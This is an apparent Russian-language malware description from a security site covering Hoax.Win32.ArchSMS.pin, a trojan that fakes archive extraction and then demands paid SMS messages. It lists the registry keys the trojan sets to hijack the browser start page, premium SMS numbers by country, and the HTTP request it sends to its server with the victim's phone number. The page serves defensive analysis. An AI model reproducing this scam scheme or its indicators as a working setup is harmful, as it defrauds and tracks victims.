Security Lab

Hoax.Win32.ArchSMS.pin

Hoax.Win32.ArchSMS.pin

Вредоносная программа, требующая выкуп за получение содержимого зашифрованного архива, который, по мнению пользователя, содержит необходимый ему файл.

Вредоносная программа, требующая выкуп за получение содержимого зашифрованного архива, который, по мнению пользователя, содержит необходимый ему файл. Является приложением Windows (PE-EXE файл). Имеет размер 1212425 байт. Написана на C++.


name="doc3">

Деструктивная активность

После запуска троянец выполняет следующие действия:

  • создает ключи системного реестра:

  • Изменяет стартовую страницу браузера Internet Explorer, устанавливая следующие значения ключей системного реестра: 
    [HKLM\Software\Microsoft\Internet Explorer\Main]
    "Default_Page_URL"="http://www.sm***xi.net"
    "Start Page"="http://www.sm***xi.net"

    [HKCU\Software\Microsoft\Internet Explorer\Main]
    "Default_Page_URL"="http://www.sm***xi.net"
    "Start Page"="http://www.sm***xi.net"
  • В своем рабочем каталоге создает файл: 
    %WorkDir%\xsendexe.tmp
    и записывает в него сроку: 
    est
    Троянец отображает следующее окно:

    После подтверждения пункта "Я согласен(на) с правилами", выбора места распаковки, а также нажатия на кнопку "Распаковать" – вредонос имитирует процесс распаковки файлов. На определенном этапе данный процесс останавливается и пользователю предлагается заполнить поля формы, а потом отправить СМС:

    Для других стран предлагается отправить СМС с текстом: 

    43***04
    Ниже приведены страна и номер, на который нужно отправить СМС: 
    Австрия 0930399999
    Бельгия         7796
    Болгария        1098
    Чехия           9090199
    Германия        80888
    Дания           1945
    Эстония 17013
    Испания 5339
    Финляндия       179479
    Франция 83868
    Венгрия 90645045
    Киргизия        1171
    Литва           1645
    Латвия          1874
    Нидерланды      7117
    Норвегия        2322
    Польша          7910
    Португалия      68305
    Швеция          72170
    Для Украины, нужно отправить СМС с текстом: 
    77***01
    на номер: 
    4161
    При отправке подтверждающего сообщения троянец осуществляет следующий HTTP запрос: 
    GET /pass_request/?guid=3de9581b497e3ea0b9c822735a719b00
    &parid=0&xnum=
    &xid=&nomer=+7<номер телефона>m=zb&fn=&xtime=
    <rnd1>&lp=<rnd2> HTTP/1.1
    Accept: */*
    Cache-Control: no-cache
    User-Agent: Opera 10
    Host: wlnrar-auth4.net
    Connection: Keep-Alive
    где <rnd1> - произвольная числовая последовательность длинною 5 символов; <rnd2> - произвольная последовательность цифр и букв латинского алфавита. В ответ сервер возвращает некоторое целое число, например "899".

Ваша приватность умирает красиво, но мы можем спасти её.

Присоединяйтесь к нам!

Новости по теме

DuneQuixote: поэзию для обхода антивирусов используют хакеры на Ближнем Востоке

Глобальный контроль: Вашингтон выводит всевидящее око на орбиту Земли

Apple удалила WhatsApp, Telegram и Signal из китайского App Store

$42 млн и 250 жертв: CISA поделилась неутешительной статистикой по вымогательской группе Akira

Государство планирует компенсировать разницу в стоимости отечественной и зарубежной электроники

Le Slip Français: кибербандиты копаются в нижнем белье французов

Четвертая поправка не продается: властям США придется уважать частную жизнь?

Проверьте видеокарту: Salad превратила ПК геймеров в фабрики порнографии

Мона Лиза читает рэп: ИИ-модель VASA-1 создает дипфейки по щелчку пальцев